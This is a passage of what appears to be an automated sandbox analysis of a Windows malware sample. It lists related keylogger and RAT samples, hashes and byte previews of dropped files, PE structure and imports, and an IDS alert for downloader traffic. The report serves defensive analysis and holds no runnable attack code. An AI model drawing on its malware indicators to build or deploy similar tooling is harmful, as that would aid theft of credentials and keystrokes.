	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\vnV17JImCH.exe
File Type:	data
Category:	dropped
Size (bytes):	202668
Entropy (8bit):	7.980211212358585
Encrypted:	false
SSDEEP:	3072:XHq0fN0ptR+uGHTmhjMeXpBrqRYq7/ue1MFhN9ZtQEgLapZuwBVhkB:7VsEXHTyZXp+YqSea3Nz6Eg23NG
MD5:	16482D589DCEC09019B463FCE895DB40
SHA1:	306A8E4640906FE18B21307198B7D3ADE55F9AAF
SHA-256:	66A7E17297ACCB83E3AEE2A4AFD0D1DBD5DC76788A9646E09ED9155E5EC8093D
SHA-512:	7F976D42C9CC7D0C3E54775F4129D4F898D122E6217D7A24F5C1F4AA77124DCFD3D2C5D7477522D8A9612A2E0133736BCD0592DEB2694313EECF0BEB3699383D
Malicious:	false
Reputation:	low
Preview:	EA06..,...u5..J.O..)t=.&e1.Ui.....9.N..I...I.L.4..\..~.`..E.x&./5..i......E<..(.i%zQY...)4.Y=.T..<.m...c1...".K%..$.q..T.F.......e..G...]..J.])..5g....Z..j..Bg.]..W.I${....".....}..7.F&..<".1.X.Z)..G..h......J..+3.$.9Z..^.2.R.....V.....f....P...J.?"U\|..T..S@.L..?53.M.SZUWoc..)3...R.......CJ.....(.&...N.Y@.Z.B..R@T>...U......Y.W................0..T..(..H...L......1R.K.\|.{W..'............."_%u).........../.T+.....K........zg.9.kN.Mi...b..Q.F&.HX.?..+...pb6..b.K.v....>Q....]i..U.f+.X...8.D...&.......l..)..m%..DN....6`B..U.W..M.?K...`.O.....2.......mcu..s........UL.mg..^q....t.....L....bk.O.SZ..a.Q>.......b...%/s#....f.i..`(s:/..[..v.nD....R6...c.u...f+..N3......=.7Va\|..8W[....s.........3.....k\|....CbRn.'...ck`"$.U-.O?..=.{..94...K.{=U.e3....)3m.".......1p..f^..+IV.L.8...4.....+..M/2Z6....L.q<...m...[...*U@.T.r:..n.3...sj."...o..;..._...N4..N.nv.z.....i.~..a...#.Kn..F..+..F...g.....1.....J.n...6....#..m.t>M>uz..~V....G(...

C:\Users\user\AppData\Local\Temp\autB4FB.tmp

Download File

Process:	C:\Users\user\Desktop\vnV17JImCH.exe
File Type:	data
Category:	dropped
Size (bytes):	14656
Entropy (8bit):	7.625506121625235
Encrypted:	false
SSDEEP:	384:dTYznw6siKOPIyznfvWME9lMYIOgjSPki:dAw6si7nfvWLxBki
MD5:	C0CA6145CE7D12D892EF03B0470A1864
SHA1:	5DA8A381F2739C86C3784A3369DE9743B42529E9
SHA-256:	5823E78DF9F5757C4F8DBA9A64CBE17CD2BB8FD894B26DFA6D4E8357A5D84347
SHA-512:	36E1DD2ECAF25FB1F30840CB7930CCCBC0E56A8782753079EA38F60E047FFFC240016F5D5A80F9AF6A632D4E469D5373BBF3D055FAF0C797E8F585D7579F1BA4
Malicious:	false
Reputation:	low
Preview:	EA06..0..Y&.y..+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\bezzo

Download File

Process:	C:\Users\user\Desktop\vnV17JImCH.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	143378
Entropy (8bit):	2.793827072873235
Encrypted:	false
SSDEEP:	192:mNxyGyDZFuiaxIUUfMMVQc3GkcVoudfSq5+vLk4ksDWMA/qb35mwBgZiXsJahYVi:P
MD5:	DF4FB86EC1B4654C54D9B4A1B4AE2DF5
SHA1:	386F86054D8D3BF1DD21C91583897788B07D819C
SHA-256:	5F216127D16170310E417E767BD66D051D655EDAAAC1108C3E001FEF5FB2820E
SHA-512:	FBDDE8ED3C18C8B375F15B5E46D1BCDAA5335DC0855BCF7586753987872611F1477713FEC393B9FA30F5627B49A6BF7FB6647444D44467AA5334C7B64D65EFD6
Malicious:	false
Reputation:	low
Preview:	2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9

C:\Users\user\AppData\Local\Temp\proximobuccal

Download File

Process:	C:\Users\user\Desktop\vnV17JImCH.exe
File Type:	data
Category:	dropped
Size (bytes):	207872
Entropy (8bit):	7.857207553746512
Encrypted:	false
SSDEEP:	6144:smagtilnrPMgA7ll+DKuKDDMFsvlj5rrpPoc:smagQnrPMf7loWBYuvDrV
MD5:	A934D457135A05E7D8E8E62A11F55260
SHA1:	C0913974AB4EDA246CC8F6C0392F1972DF462945
SHA-256:	9E202165D6AB62517E28FCF2EBD33B2F9B1F319590E618C05EBD0E60E91E9600
SHA-512:	91638CD89620B4AD0B388DFD86B55BC4858488356466F3F994F9AF458764F8E7BF96AEB3F51BB37A753B6022CAE546C4DFA548A0EB54383C00A02BE42B2CF196
Malicious:	false
Reputation:	low
Preview:	...Z;RRO7HKC..21.ULX5DK9.8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JU.X5DE&.6R.F.i.B...e"<?xE6$^(Y?r,R&%,=.PTj'96.-%..w.r"\,.mD;8.JULX5DKQJ..~>.6g2.H.@.+~{J:tH.FY..Mc:.7.C.4.=.KvhW$$#.1.k"=.G.Oxv7&.5.G.Q1:cB.5CI621JULX5DK9Z8R...KCI6btJU.Y1D?.ZhRRO3HKCI.2.K^MQ5D.8Z8.SO3HKCf.21JELX5.J9Z8.RO#HKCK624JULX5DK<Z8RRO3HK3J625JU.c7DI9Z.RR_3H[CI62!JU\X5DK9Z(RRO3HKCI621.@NXeDK9ZXPR.8IKCI621JULX5DK9Z8RRO3HKCI6.KUPX5DK9Z8RRO3HKCI621JULX5DK9Z._POsHKCI621JULX5.J9.9RRO3HKCI621JULX5DK9Z8RRO3He7,NF1JUT.4DK)Z8R.N3HOCI621JULX5DK9Z.RR/.:/"=W21.8LX5.J9ZVRRO.IKCI621JULX5DKyZ8.\|+R<*CI6..JULx7DK/Z8RXM3HKCI621JULX5.K9.. !=PHKC.=31J5NX5HJ9Z.PRO3HKCI621JUL.5D.9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI621JULX5DK9Z8RRO3HKCI

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.17875816107451462
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vnV17JImCH.exe
File size:	80'740'352 bytes
MD5:	01f9c9f129a9de9d594addb7c32d194d
SHA1:	5a6939cfb1c3d920864c9d996da223f0f3eee59f
SHA256:	5c68b2915de0bd72f32898d3eeefb4349f973863b78e5bf74c6db1ec94c29344
SHA512:	2b2c2cb45cf5b9d5fab6ebb6ea747ba5672fa10f9dc1337961051585c2457cfe045d58a1c0d0d38d250d34f2f7b6dce92b2fbdde2cf3ec200675ee3843285abc
SSDEEP:	24576:du6J33O0c+JY5UZ+XC0kGso6Facv3wma2g6Tm0WY:vu0c++OCvkGs9FacfwnJY
TLSH:	AF08BE2273DDC360CB669173BF6AB7016EBF7C614A30B85B2F980D7DA950161122D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6756DBCC [Mon Dec 9 12:00:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FC9E116BCAAh
jmp 00007FC9E115EA74h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FC9E115EBFAh
cmp edi, eax
jc 00007FC9E115EF5Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FC9E115EBF9h
rep movsb
jmp 00007FC9E115EF0Ch
cmp ecx, 00000080h
jc 00007FC9E115EDC4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FC9E115EC00h
bt dword ptr [004BE324h], 01h
jc 00007FC9E115F0D0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FC9E115ED9Dh
test edi, 00000003h
jne 00007FC9E115EDAEh
test esi, 00000003h
jne 00007FC9E115ED8Dh
bt edi, 02h
jnc 00007FC9E115EBFFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FC9E115EC03h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FC9E115EC55h
bt esi, 03h
jnc 00007FC9E115ECA8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x42b18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10a000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x42b18	0x42c00	aa503955436e563f6affc2be2446e862	False	0.9014769136235955	data	7.831736532994385	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10a000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x39dde	data			1.0003417404291586
RT_GROUP_ICON	0x109598	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x109610	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x109624	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x109638	0x14	data	English	Great Britain	1.25
RT_VERSION	0x10964c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x109728	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:40:59.672623+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49710	158.101.44.242	80	TCP
